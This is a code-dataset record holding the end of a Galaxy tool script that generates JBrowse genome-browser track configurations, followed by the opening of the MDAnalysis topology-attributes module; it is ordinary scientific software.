url = os.path.join('raw', trackData['label'] + '.vcf.gz')
trackData.update({
"urlTemplate": url,
"type": "JBrowse/View/Track/HTMLVariants",
"storeClass": "JBrowse/Store/SeqFeature/VCFTabix",
})
self._add_track_json(trackData)
def _sort_gff(self, data, dest):
if not os.path.exists(dest):
# Only index if not already done
cmd = "gff3sort.pl --precise '%s' | grep -v \"^$\" > '%s'" % (data, dest)
self.subprocess_popen(cmd)
cmd = ['bgzip', '-f', dest]
self.subprocess_popen(' '.join(cmd))
cmd = ['tabix', '-f', '-p', 'gff', dest + '.gz']
self.subprocess_popen(' '.join(cmd))
def add_features(self, data, format, trackData, gffOpts, **kwargs):
dest = os.path.join(self.outdir, 'data', 'raw', trackData['label'] + '.gff')
self._sort_gff(data, dest)
url = os.path.join('raw', trackData['label'] + '.gff.gz')
trackData.update({
"urlTemplate": url,
"storeClass": "JBrowse/Store/SeqFeature/GFF3Tabix",
})
if 'match' in gffOpts:
trackData['glyph'] = 'JBrowse/View/FeatureGlyph/Segments'
trackType = 'JBrowse/View/Track/CanvasFeatures'
if 'trackType' in gffOpts:
trackType = gffOpts['trackType']
trackData['type'] = trackType
trackData['trackType'] = trackType # Probably only used by old jbrowse versions
if trackType in ['JBrowse/View/Track/CanvasFeatures', 'NeatCanvasFeatures/View/Track/NeatFeatures']:
if 'transcriptType' in gffOpts and gffOpts['transcriptType']:
trackData['transcriptType'] = gffOpts['transcriptType']
if 'subParts' in gffOpts and gffOpts['subParts']:
trackData['subParts'] = gffOpts['subParts']
if 'impliedUTRs' in gffOpts and gffOpts['impliedUTRs']:
trackData['impliedUTRs'] = gffOpts['impliedUTRs']
elif trackType in ['JBrowse/View/Track/HTMLFeatures', 'NeatHTMLFeatures/View/Track/NeatFeatures']:
if 'topLevelFeatures' in gffOpts and gffOpts['topLevelFeatures']:
trackData['topLevelFeatures'] = gffOpts['topLevelFeatures']
self._add_track_json(trackData)
if gffOpts.get('index', 'false') == 'true':
self.tracksToIndex.append("%s" % trackData['label'])
def add_rest(self, url, trackData):
data = {
"label": trackData['label'],
"key": trackData['key'],
"category": trackData['category'],
"type": "JBrowse/View/Track/HTMLFeatures",
"storeClass": "JBrowse/Store/SeqFeature/REST",
"baseUrl": url
}
self._add_track_json(data)
def add_sparql(self, url, query, trackData):
data = {
"label": trackData['label'],
"key": trackData['key'],
"category": trackData['category'],
"type": "JBrowse/View/Track/CanvasFeatures",
"storeClass": "JBrowse/Store/SeqFeature/SPARQL",
"urlTemplate": url,
"queryTemplate": query
}
self._add_track_json(data)
def traverse_to_option_parent(self, splitKey, outputTrackConfig):
trackConfigSubDict = outputTrackConfig
for part in splitKey[:-1]:
if trackConfigSubDict.get(part) is None:
trackConfigSubDict[part] = dict()
trackConfigSubDict = trackConfigSubDict[part]
assert isinstance(trackConfigSubDict, dict), 'Config element {} is not a dict'.format(trackConfigSubDict)
return trackConfigSubDict
def get_formatted_option(self, valType2ValDict, mapped_chars):
assert isinstance(valType2ValDict, dict) and len(valType2ValDict.items()) == 1
for valType, value in valType2ValDict.items():
if valType == "text":
for char, mapped_char in mapped_chars.items():
value = value.replace(mapped_char, char)
elif valType == "integer":
value = int(value)
elif valType == "float":
value = float(value)
else: # boolean
value = {'true': True, 'false': False}[value]
return value
def set_custom_track_options(self, customTrackConfig, outputTrackConfig, mapped_chars):
for optKey, optType2ValDict in customTrackConfig.items():
splitKey = optKey.split('.')
trackConfigOptionParent = self.traverse_to_option_parent(splitKey, outputTrackConfig)
optVal = self.get_formatted_option(optType2ValDict, mapped_chars)
trackConfigOptionParent[splitKey[-1]] = optVal
def process_annotations(self, track):
category = track['category'].replace('__pd__date__pd__', TODAY)
outputTrackConfig = {
'style': {
'label': track['style'].get('label', 'description'),
'className': track['style'].get('className', 'feature'),
'description': track['style'].get('description', ''),
},
'overridePlugins': track['style'].get('overridePlugins', False) == 'True',
'overrideDraggable': track['style'].get('overrideDraggable', False) == 'True',
'maxHeight': track['style'].get('maxHeight', '600'),
'category': category,
}
mapped_chars = {
'>': '__gt__',
'<': '__lt__',
"'": '__sq__',
'"': '__dq__',
'[': '__ob__',
']': '__cb__',
'{': '__oc__',
'}': '__cc__',
'@': '__at__',
'#': '__pd__',
"": '__cn__'
}
for i, (dataset_path, dataset_ext, track_human_label, extra_metadata) in enumerate(track['trackfiles']):
# Unsanitize labels (element_identifiers are always sanitized by Galaxy)
for key, value in mapped_chars.items():
track_human_label = track_human_label.replace(value, key)
log.info('Processing %s / %s', category, track_human_label)
outputTrackConfig['key'] = track_human_label
# We add extra data to hash for the case of REST + SPARQL.
if 'conf' in track and 'options' in track['conf'] and 'url' in track['conf']['options']:
rest_url = track['conf']['options']['url']
else:
rest_url = ''
# I chose to use track['category'] instead of 'category' here. This
# is intentional. This way re-running the tool on a different date
# will not generate different hashes and make comparison of outputs
# much simpler.
hashData = [str(dataset_path), track_human_label, track['category'], rest_url]
hashData = '|'.join(hashData).encode('utf-8')
outputTrackConfig['label'] = hashlib.md5(hashData).hexdigest() + '_%s' % i
outputTrackConfig['metadata'] = extra_metadata
# Colour parsing is complex due to different track types having
# different colour options.
colourOptions = self.cs.parse_colours(track['conf']['options'], track['format'], gff3=dataset_path)
# This used to be done with a dict.update() call, however that wiped out any previous style settings...
for key in colourOptions:
if key == 'style':
for subkey in colourOptions['style']:
outputTrackConfig['style'][subkey] = colourOptions['style'][subkey]
else:
outputTrackConfig[key] = colourOptions[key]
if 'menus' in track['conf']['options']:
menus = self.cs.parse_menus(track['conf']['options'])
outputTrackConfig.update(menus)
customTrackConfig = track['conf']['options'].get('custom_config', {})
if customTrackConfig:
self.set_custom_track_options(customTrackConfig, outputTrackConfig, mapped_chars)
# import pprint; pprint.pprint(track)
# import sys; sys.exit()
if dataset_ext in ('gff', 'gff3', 'bed'):
self.add_features(dataset_path, dataset_ext, outputTrackConfig,
track['conf']['options']['gff'])
elif dataset_ext == 'bigwig':
self.add_bigwig(dataset_path, outputTrackConfig,
track['conf']['options']['wiggle'])
elif dataset_ext == 'bigwig_multiple':
self.add_bigwig_multiple(dataset_path, outputTrackConfig,
track['conf']['options']['wiggle'])
elif dataset_ext == 'bam':
real_indexes = track['conf']['options']['pileup']['bam_indices']['bam_index']
if not isinstance(real_indexes, list):
# <bam_indices>
# <bam_index>/path/to/a.bam.bai</bam_index>
# </bam_indices>
#
# The above will result in the 'bam_index' key containing a
# string. If there are two or more indices, the container
# becomes a list. Fun!
real_indexes = [real_indexes]
self.add_bam(dataset_path, outputTrackConfig,
track['conf']['options']['pileup'],
bam_index=real_indexes[i])
elif dataset_ext == 'blastxml':
self.add_blastxml(dataset_path, outputTrackConfig, track['conf']['options']['blast'])
elif dataset_ext == 'vcf':
self.add_vcf(dataset_path, outputTrackConfig)
elif dataset_ext == 'rest':
self.add_rest(track['conf']['options']['rest']['url'], outputTrackConfig)
elif dataset_ext == 'sparql':
sparql_query = track['conf']['options']['sparql']['query']
for key, value in mapped_chars.items():
sparql_query = sparql_query.replace(value, key)
self.add_sparql(track['conf']['options']['sparql']['url'], sparql_query, outputTrackConfig)
else:
log.warn('Do not know how to handle %s', dataset_ext)
# Return non-human label for use in other fields
yield outputTrackConfig['label']
def add_final_data(self, data):
viz_data = {}
if len(data['visibility']['default_on']) > 0:
viz_data['defaultTracks'] = ','.join(data['visibility']['default_on'])
if len(data['visibility']['always']) > 0:
viz_data['alwaysOnTracks'] = ','.join(data['visibility']['always'])
if len(data['visibility']['force']) > 0:
viz_data['forceTracks'] = ','.join(data['visibility']['force'])
generalData = {}
if data['general']['aboutDescription'] is not None:
generalData['aboutThisBrowser'] = {'description': data['general']['aboutDescription'].strip()}
generalData['view'] = {
'trackPadding': data['general']['trackPadding']
}
generalData['shareLink'] = (data['general']['shareLink'] == 'true')
generalData['show_tracklist'] = (data['general']['show_tracklist'] == 'true')
generalData['show_nav'] = (data['general']['show_nav'] == 'true')
generalData['show_overview'] = (data['general']['show_overview'] == 'true')
generalData['show_menu'] = (data['general']['show_menu'] == 'true')
generalData['hideGenomeOptions'] = (data['general']['hideGenomeOptions'] == 'true')
generalData['plugins'] = data['plugins']
viz_data.update(generalData)
self._add_json(viz_data)
if 'GCContent' in data['plugins_python']:
self._add_track_json({
"storeClass": "JBrowse/Store/Sequence/IndexedFasta",
"type": "GCContent/View/Track/GCContentXY",
"label": "GC Content",
"key": "GCContentXY",
"urlTemplate": "seq/genome.fasta",
"bicolor_pivot": 0.5,
"category": "GC Content",
"metadata": {
"tool_tool": '<a target="_blank" href="https://github.com/elsiklab/gccontent/commit/030180e75a19fad79478d43a67c566ec6">elsiklab/gccontent</a>',
"tool_tool_version": "5c8b0582ecebf9edf684c76af8075fb3d30ec3fa",
"dataset_edam_format": "",
"dataset_size": "",
"history_display_name": "",
"history_user_email": "",
"metadata_dbkey": "",
}
# TODO: Expose params for everyone.
})
self._add_track_json({
"storeClass": "JBrowse/Store/Sequence/IndexedFasta",
"type": "GCContent/View/Track/GCContentXY",
"label": "GC skew",
"key": "GCSkew",
"urlTemplate": "seq/genome.fasta",
"gcMode": "skew",
"min_score": -1,
"bicolor_pivot": 0,
"category": "GC Content",
"metadata": {
"tool_tool": '<a target="_blank" href="https://github.com/elsiklab/gccontent/commit/030180e75a19fad79478d43a67c566ec6">elsiklab/gccontent</a>',
"tool_tool_version": "5c8b0582ecebf9edf684c76af8075fb3d30ec3fa",
"dataset_edam_format": "",
"dataset_size": "",
"history_display_name": "",
"history_user_email": "",
"metadata_dbkey": "",
}
# TODO: Expose params for everyone.
})
if 'ComboTrackSelector' in data['plugins_python']:
with open(os.path.join(self.outdir, 'data', 'trackList.json'), 'r') as handle:
trackListJson = json.load(handle)
trackListJson.update({
"trackSelector": {
"renameFacets": {
"tool_tool": "Tool ID",
"tool_tool_id": "Tool ID",
"tool_tool_version": "Tool Version",
"dataset_edam_format": "EDAM",
"dataset_size": "Size",
"history_display_name": "History Name",
"history_user_email": "Owner",
"metadata_dbkey": "Dbkey",
},
"displayColumns": [
"key",
"tool_tool",
"tool_tool_version",
"dataset_edam_format",
"dataset_size",
"history_display_name",
"history_user_email",
"metadata_dbkey",
],
"type": "Faceted",
"title": ["Galaxy Metadata"],
"icon": "https://galaxyproject.org/images/logos/galaxy-icon-square.png",
"escapeHTMLInData": False
},
"trackMetadata": {
"indexFacets": [
"category",
"key",
"tool_tool_id",
"tool_tool_version",
"dataset_edam_format",
"history_user_email",
"history_display_name"
]
}
})
with open(os.path.join(self.outdir, 'data', 'trackList2.json'), 'w') as handle:
json.dump(trackListJson, handle)
def clone_jbrowse(self, jbrowse_dir, destination):
"""Clone a JBrowse directory into a destination directory.
"""
# JBrowse seems to have included some bad symlinks, cp ignores bad symlinks
# unlike copytree
cmd = ['cp', '-r', os.path.join(jbrowse_dir, '.'), destination]
log.debug(' '.join(cmd))
subprocess.check_call(cmd)
cmd = ['mkdir', '-p', os.path.join(destination, 'data', 'raw')]
log.debug(' '.join(cmd))
subprocess.check_call(cmd)
# http://unix.stackexchange.com/a/38691/22785
# JBrowse releases come with some broken symlinks
cmd = ['find', destination, '-type', 'l', '-xtype', 'l']
log.debug(' '.join(cmd))
symlinks = subprocess.check_output(cmd)
for i in symlinks:
try:
os.unlink(i)
except OSError:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="", epilog="")
parser.add_argument('xml', type=argparse.FileType('r'), help='Track Configuration')
parser.add_argument('--jbrowse', help='Folder containing a jbrowse release')
parser.add_argument('--outdir', help='Output directory', default='out')
parser.add_argument('--standalone', help='Standalone mode includes a copy of JBrowse', action='store_true')
parser.add_argument('--version', '-V', action='version', version="%(prog)s 0.8.0")
args = parser.parse_args()
tree = ET.parse(args.xml.name)
root = tree.getroot()
# This should be done ASAP
GALAXY_INFRASTRUCTURE_URL = root.find('metadata/galaxyUrl').text
# Sometimes this comes as `localhost` without a protocol
if not GALAXY_INFRASTRUCTURE_URL.startswith('http'):
# so we'll prepend `http://` and hope for the best. Requests *should*
# be GET and not POST so it should redirect OK
GALAXY_INFRASTRUCTURE_URL = 'http://' + GALAXY_INFRASTRUCTURE_URL
jc = JbrowseConnector(
jbrowse=args.jbrowse,
outdir=args.outdir,
genomes=[
{
'path': os.path.realpath(x.attrib['path']),
'meta': metadata_from_node(x.find('metadata'))
}
for x in root.findall('metadata/genomes/genome')
],
standalone=args.standalone,
gencode=root.find('metadata/gencode').text
)
extra_data = {
'visibility': {
'default_on': [],
'default_off': [],
'force': [],
'always': [],
},
'general': {
'defaultLocation': root.find('metadata/general/defaultLocation').text,
'trackPadding': int(root.find('metadata/general/trackPadding').text),
'shareLink': root.find('metadata/general/shareLink').text,
'aboutDescription': root.find('metadata/general/aboutDescription').text,
'show_tracklist': root.find('metadata/general/show_tracklist').text,
'show_nav': root.find('metadata/general/show_nav').text,
'show_overview': root.find('metadata/general/show_overview').text,
'show_menu': root.find('metadata/general/show_menu').text,
'hideGenomeOptions': root.find('metadata/general/hideGenomeOptions').text,
},
'plugins': [],
'plugins_python': [],
}
plugins = root.find('plugins').attrib
if plugins['GCContent'] == 'True':
extra_data['plugins_python'].append('GCContent')
extra_data['plugins'].append({
'location': 'https://cdn.jsdelivr.net/gh/elsiklab/gccontent@5c8b0582ecebf9edf684c76af8075fb3d30ec3fa/',
'name': 'GCContent'
})
# Not needed in 1.16.1: it's built in the conda package now, and this plugin doesn't need to be enabled anywhere
# if plugins['Bookmarks'] == 'True':
# extra_data['plugins'].append({
# 'location': 'https://cdn.jsdelivr.net/gh/TAMU-CPT/bookmarks-jbrowse@5242694120274c86e1ccd5cb0e5e943e78f82393/',
# 'name': 'Bookmarks'
# })
# Not needed in 1.16.1: it's built in the conda package now, and this plugin doesn't need to be enabled anywhere
if plugins['ComboTrackSelector'] == 'True':
extra_data['plugins_python'].append('ComboTrackSelector')
# Not needed in 1.16.1: it's built in the conda package now, and this plugin doesn't need to be enabled anywhere
# extra_data['plugins'].append({
# 'location': 'https://cdn.jsdelivr.net/gh/Arabidopsis-Information-Portal/ComboTrackSelector@52403928d5ccbe2e3a86b0fa5eb8e61c0f2e2f57/',
# 'icon': 'https://galaxyproject.org/images/logos/galaxy-icon-square.png',
# 'name': 'ComboTrackSelector'
# })
if plugins['theme'] == 'Minimalist':
extra_data['plugins'].append({
'location': 'https://cdn.jsdelivr.net/gh/erasche/jbrowse-minimalist-theme@d698718442da306cf87f033c72ddb745f3077775/',
'name': 'MinimalistTheme'
})
elif plugins['theme'] == 'Dark':
extra_data['plugins'].append({
'location': 'https://cdn.jsdelivr.net/gh/erasche/jbrowse-dark-theme@689eceb7e33bbc1b9b15518d45a5a79b2e5d0a26/',
'name': 'DarkTheme'
})
if plugins['BlastView'] == 'True':
extra_data['plugins_python'].append('BlastView')
extra_data['plugins'].append({
'location': 'https://cdn.jsdelivr.net/gh/TAMU-CPT/blastview@97572a21b7f011c2b4d9a0b5af40e292d694cbef/',
'name': 'BlastView'
})
for track in root.findall('tracks/track'):
track_conf = {}
track_conf['trackfiles'] = []
is_multi_bigwig = False
try:
if track.find('options/wiggle/multibigwig') and (track.find('options/wiggle/multibigwig').text == 'True'):
is_multi_bigwig = True
multi_bigwig_paths = []
except KeyError:
pass
trackfiles = track.findall('files/trackFile')
if trackfiles:
for x in track.findall('files/trackFile'):
if is_multi_bigwig:
multi_bigwig_paths.append((x.attrib['label'], os.path.realpath(x.attrib['path'])))
else:
if trackfiles:
metadata = metadata_from_node(x.find('metadata'))
track_conf['trackfiles'].append((
os.path.realpath(x.attrib['path']),
x.attrib['ext'],
x.attrib['label'],
metadata
))
else:
# For tracks without files (rest, sparql)
track_conf['trackfiles'].append((
'', # N/A, no path for rest or sparql
track.attrib['format'],
track.find('options/label').text,
{}
))
if is_multi_bigwig:
metadata = metadata_from_node(x.find('metadata'))
track_conf['trackfiles'].append((
multi_bigwig_paths, # Passing an array of paths to represent as one track
'bigwig_multiple',
'MultiBigWig', # Giving an hardcoded name for now
{} # No metadata for multiple bigwig
))
track_conf['category'] = track.attrib['cat']
track_conf['format'] = track.attrib['format']
try:
# Only pertains to gff3 + blastxml. TODO?
track_conf['style'] = {t.tag: t.text for t in track.find('options/style')}
except TypeError:
track_conf['style'] = {}
pass
track_conf['conf'] = etree_to_dict(track.find('options'))
keys = jc.process_annotations(track_conf)
for key in keys:
extra_data['visibility'][track.attrib.get('visibility', 'default_off')].append(key)
jc.add_final_data(extra_data)
jc.generate_names()
|
gvlproject/tools-iuc
|
tools/jbrowse/jbrowse.py
|
Python
|
mit
| 46,361
|
[
"BLAST",
"Galaxy"
] |
49e9e40c05f0113a08394281a092026a88fdf0d17f859bebb0a4e14a6436a60d
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
r"""
Topology attribute objects --- :mod:`MDAnalysis.core.topologyattrs`
===================================================================
Common :class:`TopologyAttr` instances that are used by most topology
parsers.
TopologyAttrs are used to contain attributes such as atom names or resids.
These are usually read by the TopologyParser.
"""
from collections import defaultdict
import copy
import functools
import itertools
import numbers
from inspect import signature as inspect_signature
import warnings
import textwrap
from types import MethodType
import Bio.Seq
import Bio.SeqRecord
import numpy as np
from ..lib.util import (cached, convert_aa_code, iterable, warn_if_not_unique,
unique_int_1d)
from ..lib import transformations, mdamath
from ..exceptions import NoDataError, SelectionError
from .topologyobjects import TopologyGroup
from . import selection
from .groups import (ComponentBase, GroupBase,
Atom, Residue, Segment,
AtomGroup, ResidueGroup, SegmentGroup,
check_wrap_and_unwrap, _pbc_to_wrap)
from .. import _TOPOLOGY_ATTRS, _TOPOLOGY_TRANSPLANTS, _TOPOLOGY_ATTRNAMES
def _check_length(func):
"""Wrapper which checks the length of inputs to set_X
Eg:
@_check_length
def set_X(self, group, values):
Will check the length of *values* compared to *group* before proceeding with
anything in the *set_X* method.
Pseudo code for the check:
if group in (Atom, Residue, Segment):
values must be single values, ie int, float or string
else:
values must be single value OR same length as group
"""
_SINGLE_VALUE_ERROR = ("Setting {cls} {attrname} with wrong sized input. "
"Must use single value, length of supplied values: {lenvalues}.")
# Eg "Setting Residue resid with wrong sized input. Must use single value, length of supplied
# values: 2."
_GROUP_VALUE_ERROR = ("Setting {group} {attrname} with wrong sized array. "
"Length {group}: {lengroup}, length of supplied values: {lenvalues}.")
# Eg "Setting AtomGroup masses with wrong sized array. Length AtomGroup: 100, length of
# supplied values: 50."
def _attr_len(values):
# quasi len measurement
# strings, floats, ints are len 0, ie not iterable
# other iterables are just len'd
if iterable(values):
return len(values)
else:
return 0 # special case
@functools.wraps(func)
def wrapper(attr, group, values):
val_len = _attr_len(values)
if isinstance(group, ComponentBase):
if not val_len == 0:
raise ValueError(_SINGLE_VALUE_ERROR.format(
cls=group.__class__.__name__, attrname=attr.singular,
lenvalues=val_len))
else:
if not (val_len == 0 or val_len == len(group)):
raise ValueError(_GROUP_VALUE_ERROR.format(
group=group.__class__.__name__, attrname=attr.attrname,
lengroup=len(group), lenvalues=val_len))
# if everything went OK, continue with the function
return func(attr, group, values)
return wrapper
def _wronglevel_error(attr, group):
"""Generate an error for setting attr at wrong level
attr : TopologyAttr that was accessed
group : Offending Component/Group
Eg:
setting mass of residue, gets called with attr=Masses, group=residue
raises a NotImplementedError with:
'Cannot set masses from Residue. Use 'Residue.atoms.masses'
Mainly used to ensure consistent and helpful error messages
"""
if isinstance(group, (Atom, AtomGroup)):
group_level = 1
elif isinstance(group, (Residue, ResidueGroup)):
group_level = 2
elif isinstance(group, (Segment, SegmentGroup)):
group_level = 3
# What level to go to before trying to set this attr
if isinstance(attr, AtomAttr):
corr_classes = ('atoms', 'atom')
attr_level = 1
elif isinstance(attr, ResidueAttr):
corr_classes = ('residues', 'residue')
attr_level = 2
elif isinstance(attr, SegmentAttr):
corr_classes = ('segments', 'segment')
attr_level = 3
if isinstance(group, ComponentBase) and (attr_level > group_level):
# ie going downards use plurals, going upwards use singulars
# Residue.atom!s!.mass!es! but Atom.segment!!.segid!!
correct = corr_classes[1]
attrname = attr.singular
else:
correct = corr_classes[0]
attrname = attr.attrname
err_msg = "Cannot set {attr} from {cls}. Use '{cls}.{correct}.{attr} = '"
# eg "Cannot set masses from Residue. 'Use Residue.atoms.masses = '"
return NotImplementedError(err_msg.format(
attr=attrname, cls=group.__class__.__name__, correct=correct,
))
def _build_stub(method_name, method, attribute_name):
"""
Build a stub for a transplanted method.
A transplanted stub is a dummy method that gets attached to a core class
(usually from :mod:`MDAnalysis.core.groups`) and raises a
:exc:`NoDataError`.
The stub mimics the original method for everything that has traits with the
documentation (docstring, name, signature). It gets overwritten by the
actual method when the latter is transplanted at universe creation.
Parameters
----------
method_name: str
The name of the attribute in the destination class.
method: Callable
The method to be mimicked.
attribute_name: str
The name topology attribute that is required for the method to be
relevant (e.g. masses, charges, ...)
Returns
-------
The stub.
"""
def stub_method(self, *args, **kwargs):
message = (
'{class_name}.{method_name}() '
'not available; this requires {attribute_name}'
).format(
class_name=self.__class__.__name__,
method_name=method_name,
attribute_name=attribute_name,
)
raise NoDataError(message)
annotation = textwrap.dedent("""\
.. note::
This requires the underlying topology to have {}. Otherwise, a
:exc:`~MDAnalysis.exceptions.NoDataError` is raised.
""".format(attribute_name))
# The first line of the original docstring is not indented, but the
# subsequent lines are. We want to dedent the whole docstring.
first_line, other_lines = method.__doc__.split('\n', 1)
stub_method.__doc__ = (
first_line + '\n'
+ textwrap.dedent(other_lines)
+ '\n\n' + annotation
)
stub_method.__name__ = method_name
stub_method.__signature__ = inspect_signature(method)
return stub_method
def _attach_transplant_stubs(attribute_name, topology_attribute_class):
"""
Transplant a stub for every method that will be transplanted from a
topology attribute.
Parameters
----------
attribute_name: str
User-facing name of the topology attribute (e.g. masses, charges, ...)
topology_attribute_class:
Topology attribute class to inspect for transplant methods.
"""
transplants = topology_attribute_class.transplants
for dest_class, methods in transplants.items():
if dest_class == 'Universe':
# Cannot be imported at the top level, it creates issues with
# circular imports.
from .universe import Universe
dest_class = Universe
for method_name, method_callback in methods:
# Methods the name of which is prefixed by _ should not be accessed
# directly by a user, we do not transplant a stub as the stubs are
# only relevant for user-facing method and properties. Also,
# methods _-prefixed can be operator methods, and we do not want
# to overwrite these with a stub.
if method_name.startswith('_'):
continue
is_property = False
try:
method_callback = method_callback.fget
is_property = True
except AttributeError:
pass
stub = _build_stub(method_name, method_callback, attribute_name)
if is_property:
setattr(dest_class, method_name, property(stub, None, None))
else:
setattr(dest_class, method_name, stub)
# TODO: remove bfactors in 3.0
BFACTOR_WARNING = ("The bfactor topology attribute is only "
"provided as an alias to the tempfactor "
"attribute. It will be removed in "
"3.0. Please use the tempfactor attribute "
"instead.")
def deprecate_bfactor_warning(func):
def wrapper(*args, **kwargs):
"""
Bfactor alias with warning
"""
warnings.warn(BFACTOR_WARNING, DeprecationWarning)
return func(*args, **kwargs)
return wrapper
class _TopologyAttrMeta(type):
r"""Register TopologyAttrs on class creation
Each topology attribute is added to the top-level dictionaries
for various record purposes. The class itself is added to
:data:`_TOPOLOGY_ATTRS` and :data:`_TOPOLOGY_ATTRNAMES`. Transplanted
methods are also added to :data:`_TOPOLOGY_TRANSPLANTS.`
We also attempt to make the topology attribute selectable with
atom selection language by automatically generating a relevant
selection class with the singular name (``singular``) as the
selection token. Only certain ``dtype``\ s are supported; if a
selection class cannot be generated, a warning will be raised
but no error.
See also
--------
:func:`MDAnalysis.core.selection.gen_selection_class`
"""
def __init__(cls, name, bases, classdict):
type.__init__(type, name, bases, classdict)
attrname = classdict.get('attrname')
singular = classdict.get('singular', attrname)
if attrname is None:
attrname = singular
if singular:
_TOPOLOGY_ATTRS[singular] = _TOPOLOGY_ATTRS[attrname] = cls
_singular = singular.lower().replace('_', '')
_attrname = attrname.lower().replace('_', '')
_TOPOLOGY_ATTRNAMES[_singular] = singular
_TOPOLOGY_ATTRNAMES[_attrname] = attrname
for clstype, transplants in cls.transplants.items():
for name, method in transplants:
_TOPOLOGY_TRANSPLANTS[name] = [attrname, method, clstype]
clean = name.lower().replace('_', '')
_TOPOLOGY_ATTRNAMES[clean] = name
for attr in ['singular', 'attrname']:
try:
attrname = classdict[attr]
except KeyError:
pass
else:
_attach_transplant_stubs(attrname, cls)
# add each to "same attr as" class
if singular not in selection.SameSelection.prop_trans:
selection.SameSelection.prop_trans[singular] = attrname
# add each to the property selection class
if singular not in selection.PropertySelection.props:
selection.PropertySelection.props[singular] = attrname
# add token to selectiondict
if singular not in selection._SELECTIONDICT:
dtype = classdict.get("dtype")
if dtype is not None:
per_obj = classdict.get("per_object", bases[0].per_object)
try:
selection.gen_selection_class(singular, attrname,
dtype, per_obj)
except ValueError:
msg = ("A selection keyword could not be "
"automatically generated for the "
f"{singular} attribute. If you need a "
"selection keyword, define it manually "
"by subclassing core.selection.Selection")
warnings.warn(msg)
# TODO: remove in 3.0
if attrname == "tempfactors":
_TOPOLOGY_ATTRS["bfactor"] = _TOPOLOGY_ATTRS["bfactors"] = cls
selcls = selection.gen_selection_class("bfactor", "bfactors",
classdict.get("dtype"),
per_object="atom")
selcls.apply = deprecate_bfactor_warning(selcls.apply)
class TopologyAttr(object, metaclass=_TopologyAttrMeta):
"""Base class for Topology attributes.
Note
----
This class is intended to be subclassed, and mostly amounts to
a skeleton. The methods here should be present in all
:class:`TopologyAttr` child classes, but by default they raise
appropriate exceptions.
Attributes
----------
attrname : str
the name used for the attribute when attached to a ``Topology`` object
singular : str
name for the attribute on a singular object (Atom/Residue/Segment)
per_object : str
If there is a strict mapping between Component and Attribute
dtype : int/float/object
Type to coerce this attribute to be. For string use 'object'
top : Topology
handle for the Topology object TopologyAttr is associated with
"""
attrname = 'topologyattrs'
singular = 'topologyattr'
per_object = None # ie Resids per_object = 'residue'
top = None # pointer to Topology object
transplants = defaultdict(list)
target_classes = []
groupdoc = None
singledoc = None
dtype = None
def __init__(self, values, guessed=False):
if self.dtype is None:
self.values = values
else:
self.values = np.asarray(values, dtype=self.dtype)
self._guessed = guessed
@staticmethod
def _gen_initial_values(n_atoms, n_residues, n_segments):
"""Populate an initial empty data structure for this Attribute
The only provided parameters are the "shape" of the Universe
Eg for charges, provide np.zeros(n_atoms)
"""
raise NotImplementedError("No default values")
@classmethod
def from_blank(cls, n_atoms=None, n_residues=None, n_segments=None,
values=None):
"""Create a blank version of this TopologyAttribute
Parameters
----------
n_atoms : int, optional
Size of the TopologyAttribute atoms
n_residues: int, optional
Size of the TopologyAttribute residues
n_segments : int, optional
Size of the TopologyAttribute segments
values : optional
Initial values for the TopologyAttribute
"""
if values is None:
values = cls._gen_initial_values(n_atoms, n_residues, n_segments)
elif cls.dtype is not None:
# if supplied starting values and statically typed
values = np.asarray(values, dtype=cls.dtype)
return cls(values)
def copy(self):
"""Return a deepcopy of this attribute"""
return self.__class__(self.values.copy(), guessed=self._guessed)
def __len__(self):
"""Length of the TopologyAttr at its intrinsic level."""
return len(self.values)
def __getitem__(self, group):
"""Accepts an AtomGroup, ResidueGroup or SegmentGroup"""
if isinstance(group, (Atom, AtomGroup)):
return self.get_atoms(group)
elif isinstance(group, (Residue, ResidueGroup)):
return self.get_residues(group)
elif isinstance(group, (Segment, SegmentGroup)):
return self.get_segments(group)
def __setitem__(self, group, values):
if isinstance(group, (Atom, AtomGroup)):
return self.set_atoms(group, values)
elif isinstance(group, (Residue, ResidueGroup)):
return self.set_residues(group, values)
elif isinstance(group, (Segment, SegmentGroup)):
return self.set_segments(group, values)
@property
def is_guessed(self):
"""Bool of if the source of this information is a guess"""
return self._guessed
def _add_new(self, newval):
"""Resize TopologyAttr to one larger, with *newval* as the new value
.. versionadded:: 2.1.0
"""
self.values = np.concatenate([self.values, np.array([newval])])
def get_atoms(self, ag):
"""Get atom attributes for a given AtomGroup"""
raise NoDataError
def set_atoms(self, ag, values):
"""Set atom attributes for a given AtomGroup"""
raise NotImplementedError
def get_residues(self, rg):
"""Get residue attributes for a given ResidueGroup"""
raise NoDataError
def set_residues(self, rg, values):
"""Set residue attributes for a given ResidueGroup"""
raise NotImplementedError
def get_segments(self, sg):
"""Get segment attributes for a given SegmentGroup"""
raise NoDataError
def set_segments(self, sg, values):
"""Set segmentattributes for a given SegmentGroup"""
raise NotImplementedError
# core attributes
class Atomindices(TopologyAttr):
"""Globally unique indices for each atom in the group.
If the group is an AtomGroup, then this gives the index for each atom in
the group. This is the unambiguous identifier for each atom in the
topology, and it is not alterable.
If the group is a ResidueGroup or SegmentGroup, then this gives the indices
of each atom represented in the group in a 1-D array, in the order of the
elements in that group.
"""
attrname = 'indices'
singular = 'index'
target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom]
dtype = int
def __init__(self):
self._guessed = False
def set_atoms(self, ag, values):
raise AttributeError("Atom indices are fixed; they cannot be reset")
def get_atoms(self, ag):
